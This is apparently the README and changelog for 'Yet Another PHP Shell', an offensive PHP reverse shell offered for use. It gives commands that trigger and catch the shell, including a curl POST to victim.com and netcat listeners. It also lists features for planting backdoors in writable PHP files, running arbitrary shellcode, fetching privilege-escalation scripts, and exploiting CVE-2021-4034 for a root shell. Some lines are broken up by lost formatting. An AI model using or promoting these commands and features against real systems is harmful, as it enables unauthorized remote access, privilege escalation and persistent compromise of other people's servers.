Yet Another PHP Shell - The most complete PHP reverse shell
Yes, as the name reveals, this is yet another PHP reverse shell, one more among hundreds available out there, but with some advantages. It is a single PHP file containing all its functions and you can control it via a simple TCP listener (e.g. nc -lp 1337
).
In the current version (1.5), its main functions support only linux systems, but i'm planning to make it work with Windows too.
It's currently in its first version and I haven't tested it much yet, and there are still many things I intend to do and improve for the next versions (it's not done yet!), so please let me know if you've found any bugs or have some suggestion for feature or improvement. =)
!interactive
)
rlwrap nc -lp <ip> <port>
)curl -x POST -d "x=ip:port" victim.com/yaps.php
);yaps.php?s
or yaps.php?silent
to supress the bannerphp yaps.php ip port
!help - Display the help menu
!all-colors - Toggle all colors (compatible with colorless TTY)
!color - Toggle PS1 color (locally only, no environment variable is changed)
!duplicate - Spawn another YAPS connection
!enum - Download LinPEAS and LinEnum to /tmp and get them ready to use
!info - list informations about the target (the enumeration I mentioned above)
!infect - Infect writable PHP files with backdoors
!interactive - Spawn interactive reverse shells on other ports (works w/ sudo, su, mysql, etc.)
!passwd - Password option (enable, disable, set, modify)
!php - Write and run PHP on the remote host
!pwnkit - Tries to exploit CVE-2021-4034 and spawn a root revere shell
!shellcode - Send and run shellcode on the remote host
!suggester - Download Linux Exploit Suggester to /tmp and get it ready to use
v1.5 - 12/02/2022
!shellcode
to receive and run an arbitrary shellcodeduplicate()
function (you can now a range of ports)stabilize
to interactive
v1.4 - 04/02/2022
!pwnkit
to exploit CVE-2021-4034 and spawn a root reverse shellverify_update()
functionv1.3.1 - 01/08/2021
v1.3 - 28/07/2021
!infect
to infect PHP files with backdoors!stabilize
payload (bugs fixed)v1.2.2 - 18/07/2021
v1.2.1 - 17/07/2021
v1.2 - 17/07/2021
!duplicate
to spawn another shell--update|-u
)--help|-h
)php yaps.php ip port
)v1.1 - 12/07/2021
!all-colors
to toggle terminal colors and work with colorless TTYsexit
command to close socket (leave shell)!stabilize
to unset HISTSIZE and HISTFILE!info
v1.0.1 - 08/07/2021
[x,y,z]
to array(x,y,z)
to improve compatibility with older PHP versionsSome ideas were inspired by this tools:
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
https://github.com/rebootuser/LinEnum
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
https://github.com/pentestmonkey/php-reverse-shell